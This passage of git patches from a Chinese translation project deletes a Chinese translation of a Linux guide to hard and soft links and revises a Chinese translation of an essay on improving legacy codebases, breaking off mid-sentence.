+[6]:https://opensource.com/article/17/6/linking-linux-filesystem?rate=YebHxA-zgNopDQKKOyX3_r25hGvnZms_33sYBUq-SMM +[7]:https://opensource.com/user/14106/feed +[8]:https://www.flickr.com/photos/digypho/7905320090 +[9]:https://creativecommons.org/licenses/by/2.0/ +[10]:https://opensource.com/article/17/5/introduction-ext4-filesystem +[11]:https://opensource.com/article/16/11/managing-devices-linux +[12]:https://opensource.com/life/16/10/introduction-linux-filesystems +[13]:https://opensource.com/business/16/9/linux-users-guide-lvm +[14]:https://opensource.com/life/15/9/everything-is-a-file +[15]:https://opensource.com/article/17/5/introduction-ext4-filesystem +[16]:https://opensource.com/article/17/5/introduction-ext4-filesystem#fig2 +[17]:https://opensource.com/users/dboth +[18]:https://opensource.com/article/17/6/linking-linux-filesystem#comments From f0cfdb487094799d0217171a0b9eb5bb6f9b1806 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Sun, 3 Dec 2017 13:25:00 +0800 Subject: [PATCH 0153/1627] Delete 20170622 A users guide to links in the Linux filesystem.md --- ... guide to links in the Linux filesystem.md | 312 ------------------ 1 file changed, 312 deletions(-) delete mode 100644 sources/tech/20170622 A users guide to links in the Linux filesystem.md diff --git a/sources/tech/20170622 A users guide to links in the Linux filesystem.md b/sources/tech/20170622 A users guide to links in the Linux filesystem.md deleted file mode 100644 index 673fc77104..0000000000 --- a/sources/tech/20170622 A users guide to links in the Linux filesystem.md +++ /dev/null @@ -1,312 +0,0 @@ -Translating by yongshouzhang - -linux 文件链接用户指南 -============================================================ - -### 学习如何使用链接,通过提供对 linux 文件系统多个位置的文件访问,来让日常工作变得轻松 - - -![linux 文件链接用户指南](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/links.png?itok=AumNmse7 "A user's guide to links in the Linux filesystem") -Image by : [Paul Lewin][8]. Modified by Opensource.com. [CC BY-SA 2.0][9] - -在我为 opensource.com 写过的关于linux文件系统方方面面的文章中,包括 [An introduction to Linux's EXT4 filesystem][10]; [Managing devices in Linux][11]; [An introduction to Linux filesystems][12]; and [A Linux user's guide to Logical Volume Management][13],我曾简要的提到过linux文件系统一个有趣的特性,它允许用户访问linux文件目录树中多个位置的文件来简化一些任务 - -linux 文件系统中有两种链接:硬链接和软链接。虽然二者差别显著,但都用来解决相似的问题。它们都提供了对单个文件进行多个目录项的访问(引用),但实现却大为不同。链接的强大功能赋予了 linux 文件系统灵活性,因为[一切即文件][14]。 - -更多 linux 资源 - -*   [什么是 linux ?][1] - -*   [什么是 linux 容器?][2] - -*   [现在下载: linux 命令速查表][3] - -*   [linux 高级命令速查表][4] - -*   [我们最新的 linux 文章][5] - -举个例子,我曾发现一些程序要求特定的版本库方可运行。 当用升级后的库替代旧库后,程序会崩溃,提示就版本库缺失。 同城库中唯一变化是版本号。出于该直觉,我仅仅给程序添加了一个新的库链接,并以旧库名称命名。我试着再次启动程序,运行良好。 程序就是一个游戏,人人都明白,每个玩家都会尽力使游戏进行下去。 - -事实上,几乎所有的应用程序链接库都使用通用的命名规则,链接名称中包含了住版本号,链接所指文件的文件名中同样包含了最小版本号。再比如,程序的一些必需文件为了迎合 linux 文件系统的规范从一个目录移动到另一个目录中,系统为了向后兼容那些不能获取这些文件新位置的程序在旧的目录中存放了这些文件的链接。如果你对 /lib64 目录做一个长清单列表,你会发现很多这样的例子。 - -``` -lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.hwm -> ../../usr/share/cracklib/pw_dict.hwm -lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.pwd -> ../../usr/share/cracklib/pw_dict.pwd -lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.pwi -> ../../usr/share/cracklib/pw_dict.pwi -lrwxrwxrwx. 1 root root 27 Jun 9 2016 libaccountsservice.so.0 -> libaccountsservice.so.0.0.0 --rwxr-xr-x. 1 root root 288456 Jun 9 2016 libaccountsservice.so.0.0.0 -lrwxrwxrwx 1 root root 15 May 17 11:47 libacl.so.1 -> libacl.so.1.1.0 --rwxr-xr-x 1 root root 36472 May 17 11:47 libacl.so.1.1.0 -lrwxrwxrwx. 1 root root 15 Feb 4 2016 libaio.so.1 -> libaio.so.1.0.1 --rwxr-xr-x. 1 root root 6224 Feb 4 2016 libaio.so.1.0.0 --rwxr-xr-x. 1 root root 6224 Feb 4 2016 libaio.so.1.0.1 -lrwxrwxrwx. 1 root root 30 Jan 16 16:39 libakonadi-calendar.so.4 -> libakonadi-calendar.so.4.14.26 --rwxr-xr-x. 1 root root 816160 Jan 16 16:39 libakonadi-calendar.so.4.14.26 -lrwxrwxrwx. 1 root root 29 Jan 16 16:39 libakonadi-contact.so.4 -> libakonadi-contact.so.4.14.26 -``` - -**/lib64** 目录下的一些链接 - -T在上面展示的 **/lib64** 目录清单列表中,文件模式第一个字母 I 表示这是一个符号链接或软链接。 - -### 硬链接 - -在 [An introduction to Linux's EXT4 filesystem][15]一文中,我曾探讨过这样一个事实,每个文件都有一个包含该文件信息的节点,包含了该文件的位置信息。上述文章中的[图2][16]展示了一个指向文件节点的单一目录项。每个文件都至少有一个目录项指向描述该文件信息的文件节点,目录项是一个硬链接,因此每个文件至少都有一个硬链接。 - -如下图1所示,多个目录项指向了同一文件节点。这些目录项都是硬链接。我曾使用波浪线 (**~**) 表示三级目录项的缩写,这是用户目录的惯例表示,因此在该例中波浪线等同于 **/home/user** 。值得注意的是,四级目录项是一个完全不同的目录,**/home/shared** 可能是该计算机上用户的共享文件目录。 - -![fig1directory_entries.png](https://opensource.com/sites/default/files/images/life/fig1directory_entries.png) -Figure 1 - -单一文件系统中的文件硬链接数是有限制的。”文件系统“ 是就挂载在特定挂载点上的分区或逻辑卷而言的,此例中是 /home。这是因为文件系统中的节点号都是唯一的。在不同的文件系统中,如 **/var** 或 **/opt**,会有和 **/home** 中相同的节点号。 - -因为所有的硬链接都指向了包含文件元信息的节点,这些特性都是文件的一部分,像所属关系,权限,节点硬链接数目,这些特性不能区分不同的硬链接。这是一个文件所具有的一组属性。唯一能区分这些文件的是包含在节点信息中的文件名。对单靠 **file/inode** 来定位文件的同一目录中的硬链接必须拥有不同的文件名,基于上述事实,同一目录下不能存在重复的文件名。 - -文件的硬链接数目可通过 **ls -l** 来查看,如果你想查看实际节点号,可使用 **ls -li** 命令。 - -### 符号(软)链接 - -软链接(符号链接)和硬链接的区别在于,硬链接直接指向文件中的节点而软链接直接指向一个目录项,即一个硬链接。因为软链接指向一个文件的硬链接而非该文件的节点信息,所以它们并不依赖于文件节点,这使得它们能在不同的文件系统中起作用,跨越不同的分区和逻辑卷。 - -软链接的缺点是,一旦它所指向的硬链接被删除或重命名后,该软链接就失效了。软链接虽然还在,但所指向的硬链接已不存在。所幸的是,**ls** 命令能以红底白字的方式在其列表中高亮显示失效的软链接。 - -### 实验项目: 链接实验 - -我认为最容易理解链接用法及其差异的方法即使动手搭建一个项目。这个项目应以非超级用户的身份在一个空目录下进行。我创建了 **~/tmp** 目录做这个实验,你也可以这么做。这么做可为项目创建一个安全的环境且提供一个新的空目录让程序运作,如此以来这儿仅存放和程序有关的文件。 - -### **初始工作** - -首先,在你要进行实验的目录下为该项目中的任务创建一个临时目录,确保当前工作目录(PWD)是你的主目录,然后键入下列命令。 - -``` -mkdir temp -``` - -使用这个命名将当前工作目录切换到 *~/temp**  - -``` -cd temp -``` - -实验开始,我们创建一个能够链接的文件,下列命令可完成该工作并向其填充内容。 - -``` -du -h > main.file.txt -``` - -使用 *ls -l** 长列表命名确认文件被正确地创建。运行结果应类似于我的。注意文件大小只有 7 字节,但你的可能会有 1~2 字节的变动。 - -``` -[dboth@david temp]$ ls -l -total 4 --rw-rw-r-- 1 dboth dboth 7 Jun 13 07:34 main.file.txt -``` - -在列表中,文件模式串后的数字 1 代表存在于该文件上的硬链接数。现在应该是 1 ,因为我们还没有为这个测试文件建立任何硬链接。 - -### **对硬链接进行实验** - -硬链接创建一个指向同一文件节点的目录项,当为文件添加一个硬链接时,你会看到链接数目的增加。确保当前工作目录仍为 **~/temp**。创建一个指向 **main.file.txt** 的硬链接,然后查看该目录下文件列表。 - -``` -[dboth@david temp]$ ln main.file.txt link1.file.txt -[dboth@david temp]$ ls -l -total 8 --rw-rw-r-- 2 dboth dboth 7 Jun 13 07:34 link1.file.txt --rw-rw-r-- 2 dboth dboth 7 Jun 13 07:34 main.file.txt -``` - -目录中两个文件都有两个链接且大小相同,时间戳也一样。这是同一文件节点的两个不同的硬链接,即该文件的目录项。再建立一个该文件的硬链接,并列出目录清单内容,你可以建立 **link1.file.txt** 或 **main.file.txt** 的硬链接。 - -``` -[dboth@david temp]$ ln link1.file.txt link2.file.txt ; ls -l -total 16 --rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 link1.file.txt --rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 link2.file.txt --rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 main.file.txt -``` - -注意,该目录下的每个硬链接必须使用不同的名称,因为同一目录下的两个文件不能拥有相同的文件名。试着创建一个和现存链接名称相同的硬链接。 - -``` -[dboth@david temp]$ ln main.file.txt link2.file.txt -ln: failed to create hard link 'link2.file.txt': File exists -``` - -显然不行,因为 **link2.file.txt** 已经存在。目前为止我们只在同一目录下创建硬链接,接着在临时目录的父目录,你的主目录中创建一个链接。 - -``` -[dboth@david temp]$ ln main.file.txt ../main.file.txt ; ls -l ../main* --rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt -``` - - 上面的 **ls** 命令显示 **main.file.txt** 文件确实存在于主目录中,且与该文件在 temp 目录中的名称一致。当然它们是没有区别的两个文件,它们是同一文件的两个链接,指向了同一文件的目录项。为了帮助说明下一点,在 temp 目录中添加一个非链接文件。 -``` -[dboth@david temp]$ touch unlinked.file ; ls -l -total 12 --rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link1.file.txt --rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link2.file.txt --rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt --rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -使用 **ls** 命令的 **i** 选项查看文件节点的硬链接号和新创建文件的硬链接号。 - -``` -[dboth@david temp]$ ls -li -total 12 -657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link1.file.txt -657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link2.file.txt -657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -注意上面文件模式左边的数字 **657024** ,这是三个硬链接文件所指的同一文件的节点号,你也可以使用 **i** 选项查看主目录中所创建的链接节点号,和该值相同。只有一个链接的文件节点号和其他的不同,在你的系统上看到的不同于本文中的。 - -接着改变其中一个硬链接文件的大小。 - -``` -[dboth@david temp]$ df -h > link2.file.txt ; ls -li -total 12 -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link1.file.txt -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link2.file.txt -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 main.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -现在的硬链接文件大小比原来大,因为多个目录项链接着同一文件。 - -我知道下个实验在我的电脑上会成功,因为我的 **/tmp** 目录是一个独立的逻辑卷,如果你有单独的逻辑卷或文件系统在不同的分区上(如果未使用逻辑卷),确定你是否能访问那个分区或逻辑卷,如果不能,你可以在电脑上挂载一个 U盘,如果上述选项适合你,你可以进行这个实验。 - -试着在 **/tmp** 目录中建立一个 **~/temp** 目录下文件的链接(或你的文件系统所在的位置) - -``` -[dboth@david temp]$ ln link2.file.txt /tmp/link3.file.txt -ln: failed to create hard link '/tmp/link3.file.txt' => 'link2.file.txt': -Invalid cross-device link -``` - -为什么会出现这个错误呢? 原因是每一个单独的挂载文件系统都有一套自己的节点号。简单的通过文件节点号来跨越整个文件系统结构引用一个文件会使系统困惑,因为相同的节点号会存在于每个已挂载的文件系统中。 - -有时你可能会想找到一个文件节点的所有硬链接。你可以使用 **ls -li** 命令。然后使用 **find** 命令找到所有硬链接的节点号。 - -``` -[dboth@david temp]$ find . -inum 657024 -./main.file.txt -./link1.file.txt -./link2.file.txt -``` - -注意 **find** 命令不能找到所属该节点的四个硬链接,因为我们在 **~/temp** 目录中查找。 **find** 命令仅在当前工作目录及其子目录中中查找文件。要找到所有的硬链接,我们可以使用下列命令,注定你的主目录作为起始查找条件。 - -``` -[dboth@david temp]$ find ~ -samefile main.file.txt -/home/dboth/temp/main.file.txt -/home/dboth/temp/link1.file.txt -/home/dboth/temp/link2.file.txt -/home/dboth/main.file.txt -``` - -如果你是非超级用户没有权限,可能会看到错误信息。这个命令也使用了 **-samefile** 选项而不是指定文件的节点号。这个效果和使用文件节点号一样且更容易,如果你知道其中一个硬链接名称的话。 - -### **对软链接进行实验** - -如你刚才看到的,不能越过文件系统交叉创建硬链接,即在逻辑卷或文件系统中从一个文件系统到另一个文件系统。软链接给出了这个问题的解决方案。虽然他们可以达到相同的目的,但他们是非常不同的,知道这些差异是很重要的。 - -让我们在 **~/temp** 目录中创建一个符号链接来开始我们的探索。 - -``` -[dboth@david temp]$ ln -s link2.file.txt link3.file.txt ; ls -li -total 12 -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link1.file.txt -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link2.file.txt -658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> -link2.file.txt -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 main.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -拥有节点号 **657024** 的那些硬链接没有变化,且硬链接的数目也没有变化。新创建的符号链接有不同的文件节点号 **658270**。 名为**link3.file.txt** 的软链接指向了 **link2.file.txt** 文件。使用 **cat** 命令查看 **link3.file.txt** 文件的内容。符号链接的文件节点信息以字母 "**l**" 开头,意味着这个文件实际是个符号链接。 - -上例中软链接文件 **link3.file.txt** 的大小只有 14 字节。这是文本内容 **link3.file.txt -> link2.file.txt** 的大小,实际上是目录项的内容。目录项 **link3.file.txt** 并不指向一个文件节点;它指向了另一个目录项,这在跨越文件系统建立链接时很有帮助。现在试着创建一个软链接,之前在 **/tmp** 目录中尝试过的。 - -``` -[dboth@david temp]$ ln -s /home/dboth/temp/link2.file.txt -/tmp/link3.file.txt ; ls -l /tmp/link* -lrwxrwxrwx 1 dboth dboth 31 Jun 14 21:53 /tmp/link3.file.txt -> -/home/dboth/temp/link2.file.txt -``` - -### **删除链接** - -当你删除硬链接或硬链接所指的文件时,需要考虑一些问题。 - -首先,让我们删除硬链接文件 **main.file.txt**。注意每个硬链接都指向了一个文件节点。 - -``` -[dboth@david temp]$ rm main.file.txt ; ls -li -total 8 -657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link1.file.txt -657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link2.file.txt -658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> -link2.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -**main.file.txt** 是第一个硬链接文件,当该文件被创建时。现在删除它仍然保留原始文件和硬盘上的数据以及所有剩余的硬链接。要删除原始文件,你必须删除它的所有硬链接。 - -现在山村 **link2.file.txt** 硬链接文件。 - -``` -[dboth@david temp]$ rm link2.file.txt ; ls -li -total 8 -657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link1.file.txt -658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> -link2.file.txt -657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 main.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -注意软链接的变化。删除软链接所指的硬链接会使该软链接失效。在我的系统中,断开的链接用颜色高亮显示,目标硬链接闪烁。如果需要修改软链接,你需要在同一目录下建立一个和旧链接相同名字的硬链接,只要不是所有硬链接都已删除。 您还可以重新创建链接本身,链接保持相同的名称,但指向剩余的硬链接中的一个。当然如果软链接不再需要,可以使用 **rm** 命令删除它们。 - -**unlink** 命令在删除文件和链接时也有用。它非常简单且没有选项,就像 **rm** 命令一样。然而,它更准确地反映了删除的基本过程,因为它删除了目录项与被删除文件的链接。 - -### 写在最后 - -我曾与这两种类型的链接很长一段时间后,我开始了解他们的能力和特质。为我所教的Linux课程编写了一个实验室项目,以充分理解链接是如何工作的,并且我希望增进你的理解。 - --------------------------------------------------------------------------------- - -作者简介: - -戴维.布斯 - 戴维.布斯是Linux和开源倡导者,居住在Raleigh的北卡罗莱纳。他在IT行业工作了四十年,为IBM工作了20年多的OS 2。在IBM时,他在1981编写了最初的IBM PC的第一个培训课程。他教了RHCE班红帽子和曾在MCI世通公司,思科,和北卡罗莱纳州。他已经用Linux和开源软件工作将近20年了。 - ---------------------------------- - -via: https://opensource.com/article/17/6/linking-linux-filesystem - -作者:[David Both ][a] -译者:[yongshouzhang](https://github.com/yongshouzhang) -校对:[yongshouzhang](https://github.com/yongshouzhang) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/dboth -[1]:https://opensource.com/resources/what-is-linux?src=linux_resource_menu -[2]:https://opensource.com/resources/what-are-linux-containers?src=linux_resource_menu -[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=7016000000127cYAAQ -[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?src=linux_resource_menu&intcmp=7016000000127cYAAQ -[5]:https://opensource.com/tags/linux?src=linux_resource_menu -[6]:https://opensource.com/article/17/6/linking-linux-filesystem?rate=YebHxA-zgNopDQKKOyX3_r25hGvnZms_33sYBUq-SMM -[7]:https://opensource.com/user/14106/feed -[8]:https://www.flickr.com/photos/digypho/7905320090 -[9]:https://creativecommons.org/licenses/by/2.0/ -[10]:https://opensource.com/article/17/5/introduction-ext4-filesystem -[11]:https://opensource.com/article/16/11/managing-devices-linux -[12]:https://opensource.com/life/16/10/introduction-linux-filesystems -[13]:https://opensource.com/business/16/9/linux-users-guide-lvm -[14]:https://opensource.com/life/15/9/everything-is-a-file -[15]:https://opensource.com/article/17/5/introduction-ext4-filesystem -[16]:https://opensource.com/article/17/5/introduction-ext4-filesystem#fig2 -[17]:https://opensource.com/users/dboth -[18]:https://opensource.com/article/17/6/linking-linux-filesystem#comments From 6b2679d16f9d56cf084bb8e0aec26c2ab33f457d Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 3 Dec 2017 13:33:06 +0800 Subject: [PATCH 0154/1627] translating by lujun9972 --- .../tech/20171117 System Logs: Understand Your Linux System.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171117 System Logs: Understand Your Linux System.md b/sources/tech/20171117 System Logs: Understand Your Linux System.md index 0dcaa57925..a711ee2c05 100644 --- a/sources/tech/20171117 System Logs: Understand Your Linux System.md +++ b/sources/tech/20171117 System Logs: Understand Your Linux System.md @@ -1,3 +1,4 @@ +translating by lujun9972 ### System Logs: Understand Your Linux System ![chabowski](https://www.suse.com/communities/blog/files/2016/03/chabowski_avatar_1457537819-100x100.jpg) From 9449bcf71d424330396df33eb94092c921c59368 Mon Sep 17 00:00:00 2001 From: Unknown Date: Sun, 3 Dec 2017 14:04:07 +0800 Subject: [PATCH 0155/1627] tranlsated tranlsated --- ...170530 How to Improve a Legacy Codebase.md | 132 +++++++----------- 1 file changed, 51 insertions(+), 81 deletions(-) diff --git a/sources/tech/20170530 How to Improve a Legacy Codebase.md b/sources/tech/20170530 How to Improve a Legacy Codebase.md index cc1bd073a9..a1869b0449 100644 --- a/sources/tech/20170530 How to Improve a Legacy Codebase.md +++ b/sources/tech/20170530 How to Improve a Legacy Codebase.md @@ -1,131 +1,101 @@ -Translating by aiwhj -# How to Improve a Legacy Codebase # 如何改善遗留的代码库 -It happens at least once in the lifetime of every programmer, project manager or teamleader. You get handed a steaming pile of manure, if you’re lucky only a few million lines worth, the original programmers have long ago left for sunnier places and the documentation - if there is any to begin with - is hopelessly out of sync with what is presently keeping the company afloat. +这在每一个程序员,项目管理员,团队领导的一生中都会至少发生一次。原来的程序员早已离职去度假了,留下了一坨几百万行屎一样的代码和文档(如果有的话),一旦接手这些代码,想要跟上公司的进度简直让人绝望。 -它在每一个程序员,项目管理员,团队领导的一生中都会发生至少一次。原来的程序员离开了这个地方,只留下了文档,和一坨几百万行屎一样的代码。一旦接管这些代码,想要跟上公司的进度简直让人绝望。 +你的工作是带领团队摆脱这个混乱的局面 -Your job: get us out of this mess. -你的任务:让大家摆脱这个混乱的局面 +当你的第一反应过去之后,你开始去熟悉这个项目,公司的管理层都在关注着你,所以项目只能成功,然而,看了一遍代码之后却发现很大的可能会失败。那么该怎么办呢? -当你的第一反应过去之后,你开始去熟悉这个项目,公司的管理层都在关注着,项目只能成功,然而,看了一遍之后却发现了许多的错误。该怎么做呢? -After your first instinctive response (run for the hills) has passed you start on the project knowing full well that the eyes of the company senior leadership are on you. Failure is not an option. And yet, by the looks of what you’ve been given failure is very much in the cards. So what to do? +幸运(不幸)的是我已经遇到好几次这种情况了,我和我的小伙伴发现将这坨热气腾腾的屎变成一个健康可维护的项目是非常值得一试的。下面这些是我们的一些经验: -幸运(不幸)的是我已经遇到好几次这种情况了,我和我的小伙伴发现将这坨热气腾腾的屎变成一个健康可维护的项目是很值得的。下面这些是我使用的一些小技巧: -I’ve been (un)fortunate enough to be in this situation several times and me and a small band of friends have found that it is a lucrative business to be able to take these steaming piles of misery and to turn them into healthy maintainable projects. Here are some of the tricks that we employ: - -### Backup ### 备份 -在你去做任何操作之前备份与之相关的所有文件。这样可以确保不会丢失任何信息,这些信息可能会在另外一些地方很重要。一旦改变其中一些文件,你可能花费一天或者更多天都解决不了这个愚蠢的问题,配置数据通常不受版本控制,所以特别容易受到这方面影响,如果定期备份数据时连带着它一起备份了,还是比较幸运的。所以谨慎总比后悔好,复制所有东西到一个绝对安全的地方吧,而且不要轻易动他除非这些文件是只读模式。 -Before you start to do anything at all make a backup of  _everything_  that might be relevant. This to make sure that no information is lost that might be of crucial importance somewhere down the line. All it takes is a silly question that you can’t answer to eat up a day or more once the change has been made. Especially configuration data is susceptible to this kind of problem, it is usually not versioned and you’re lucky if it is taken along in the periodic back-up scheme. So better safe than sorry, copy everything to a very safe place and never ever touch that unless it is in read-only mode. +在开始做任何事情之前备份与之可能相关的所有文件。这样可以确保不会丢失任何可能会在另外一些地方很重要的信息。一旦修改其中一些文件,你可能花费一天或者更多天都解决不了这个愚蠢的问题,配置数据通常不受版本控制,所以特别容易受到这方面影响,如果定期备份数据时连带着它一起备份了,还是比较幸运的。所以谨慎总比后悔好,复制所有东西到一个绝对安全的地方吧,除非这些文件是只读模式否则不要轻易碰它。 -### Important pre-requisite, make sure you have a build process and that it actually produces what runs in production -### 你必须确认他们能够在生产环境下构建运行并产出,这是重要的先决条件。 +### 必须确保代码能够在生产环境下构建运行并产出,这是重要的先决条件。 -这一步显而易见并且已经很到位的情况下我完全错过了这一步,Hacker News 的众多评论者就会指出并且证明他们是对的:第一步是马上确保你知道在生产环境下运行着什么东西,也意味着你需要去在你的设备上构建一个跟生产环境上运行的版本每一个字节都一模一样的版本。如果你找不到实现它的办法,一旦你将它投入生产环境是,你很可能会遭遇一些很糟糕的事情。确保每一部分都尽你最大能力去测试,之后在你足够信任他能够很好的运行的时候将他弄得生产环境下。无论他运行的怎么样都要做好能够马上切换回就版本的准备,并且记录所有情况下的日志,便于接下来不可避免的 “验尸” 。 -I totally missed this step on the assumption that it is obvious and likely already in place but many HN commenters pointed this out and they are absolutely right: step one is to make sure that you know what is running in production right now and that means that you need to be able to build a version of the software that is - if your platform works that way - byte-for-byte identical with the current production build. If you can’t find a way to achieve this then likely you will be in for some unpleasant surprises once you commit something to production. Make sure you test this to the best of your ability to make sure that you have all the pieces in place and then, after you’ve gained sufficient confidence that it will work move it to production. Be prepared to switch back immediately to whatever was running before and make sure that you log everything and anything that might come in handy during the - inevitable - post mortem. +之前我假设环境已经存在,所以完全丢了这一步,Hacker News 的众多网友指出了这一点并且证明他们是对的:第一步是确认你知道在生产环境下运行着什么东西,也意味着你需要在你的设备上构建一个跟生产环境上运行的版本每一个字节都一模一样的版本。如果你找不到实现它的办法,一旦你将它投入生产环境,你很可能会遭遇一些很糟糕的事情。确保每一部分都尽力测试,之后在你足够信任它能够很好的运行的时候将它部署生产环境下。无论它运行的怎么样都要做好能够马上切换回旧版本的准备,确保日志记录下了所有情况,以便于接下来不可避免的 “验尸” 。 -### Freeze the DB ### 冻结数据库 -直到你改善了代码之前尽可能的冻结你的数据库,在你特别熟悉代码库和遗留代码的之后再去修改数据库。在这之前过早的修改数据库的话,你可能会碰到大问题,你会失去让新旧代码和数据库和数据库一起构建稳固的基础的能力。保持数据库完全不变能够比较新的逻辑代码和旧的逻辑代码造成的影响,如果都像通知的那样就没有什么影响了。 -If at all possible freeze the database schema until you are done with the first level of improvements, by the time you have a solid understanding of the codebase and the legacy code has been fully left behind you are ready to modify the database schema. Change it any earlier than that and you may have a real problem on your hand, now you’ve lost the ability to run an old and a new codebase side-by-side with the database as the steady foundation to build on. Keeping the DB totally unchanged allows you to compare the effect your new business logic code has compared to the old business logic code, if it all works as advertised there should be no differences. -### Write your tests +直到你修改代码之前尽可能冻结你的数据库,在你特别熟悉代码库和遗留代码之后再去修改数据库。在这之前过早的修改数据库的话,你可能会碰到大问题,你会失去让新旧代码和数据库一起构建稳固的基础的能力。保持数据库完全不变,就能比较新的逻辑代码和旧的逻辑代码运行的结果,比较的结果应该跟预期的没有差别。 + ### 写测试 -在你做任何改变之前,尽可能多的写下端到端测试和集成测试。确保这些测试能够正确的输出并且是在你能够清晰的知道旧的是如何工作的假设之下(准备好应对一些突发状况)。这些测试有两个重要的作用,他们能够在较早的阶段帮助你抛弃一些错误观念,在你写新代码替换旧代码的时候也有一定防护作用。 -Before you make any changes at all write as many end-to-end and integration tests as you can. Make sure these tests produce the right output and test any and all assumptions that you can come up with about how you  _think_  the old stuff works (be prepared for surprises here). These tests will have two important functions: they will help to clear up any misconceptions at a very early stage and they will function as guardrails once you start writing new code to replace old code. -自动化测试,如果你也有 CI 的使用经验,请使用它并且确保在你提交代码之后能够快速的完成所有测试。 -Automate all your testing, if you’re already experienced with CI then use it and make sure your tests run fast enough to run the full set of tests after every commit. +在你做任何改变之前,尽可能多的写下端到端测试和集成测试。在你能够清晰的知道旧的是如何工作的情况下确保这些测试能够正确的输出(准备好应对一些突发状况)。这些测试有两个重要的作用,其一,他们能够在早期帮助你抛弃一些错误观念,其二,在你写新代码替换旧代码的时候也有一定防护作用。 + +自动化测试,如果你也有 CI 的使用经验请使用它,并且确保在你提交代码之后能够快速的完成所有测试。 -### Instrumentation and logging ### 日志监控 -如果线上的旧设备需要添加上监控功能。用一个完全新的数据库,为每一个你能想到事件都添加一个简单的计数器,并且根据这些事件的名字添加一个函数增加这些计数器。用一些额外的代码实现一个时间戳事件日志,这是一个好办法知道有多少事件导致了另外一些种类的事件。例如:用户打开 APP ,用户关闭 APP 。如果这两个事件导致后端调用的数量维持长时间的不同,这个数量差就是当前打开的 APP 的数量。如果你看到打开 APP 的比关闭的多的时候,你知道哪些 APP 是关闭的必须的方法(例如崩溃)。每一个事件你会发现有许多不同种类的联系跟其他的一些事件,通常你争取维持这些固定的关系,除非有一个明显的错误在系统上。你的目标是降低那些错误的事件,最大化哪些计数器在向下到初始化的水平在链条中。(例如:用户试着支付应该得到相同数量的跟支付回调)。 -If the old platform is still available for development add instrumentation. Do this in a completely new database table, add a simple counter for every event that you can think of and add a single function to increment these counters based on the name of the event. That way you can implement a time-stamped event log with a few extra lines of code and you’ll get a good idea of how many events of one kind lead to events of another kind. One example: User opens app, User closes app. If two events should result in some back-end calls those two counters should over the long term remain at a constant difference, the difference is the number of apps currently open. If you see many more app opens than app closes you know there has to be a way in which apps end (for instance a crash). For each and every event you’ll find there is some kind of relationship to other events, usually you will strive for constant relationships unless there is an obvious error somewhere in the system. You’ll aim to reduce those counters that indicate errors and you’ll aim to maximize counters further down in the chain to the level indicated by the counters at the beginning. (For instance: customers attempting to pay should result in an equal number of actual payments received). -这是非常简单的点子去翻转每一个后端应用到一个就像真实的薄书系统一样 -This very simple trick turns every backend application into a bookkeeping system of sorts and just like with a real bookkeeping system the numbers have to match, as long as they don’t you have a problem somewhere. +如果旧设备依然可用,那么添加上监控功能。使用一个全新的数据库,为每一个你能想到的事件都添加一个简单的计数器,并且根据这些事件的名字添加一个函数增加这些计数器。用一些额外的代码实现一个带有时间戳的事件日志,这是一个好办法知道有多少事件导致了另外一些种类的事件。例如:用户打开 APP ,用户关闭 APP 。如果这两个事件导致后端调用的数量维持长时间的不同,这个数量差就是当前打开的 APP 的数量。如果你发现打开 APP 比关闭 APP 多的时候,你就必须要知道是什么原因导致 APP 关闭了(例如崩溃)。你会发现每一个事件都跟其他的一些事件有许多不同种类的联系,通常情况下你应该尽量维持这些固定的联系,除非在系统上有一个明显的错误。你的目标是减少那些错误的事件,尽可能多的在开始的时候通过使用计数器在调用链中降低到指定的级别。(例如:用户支付应该得到相同数量的支付回调)。 -在构建一个健康的系统的时候,这个系统是很珍贵的,而且它也是一个好伙伴,仅次于使用源码控制修改系统日志,你可以确认 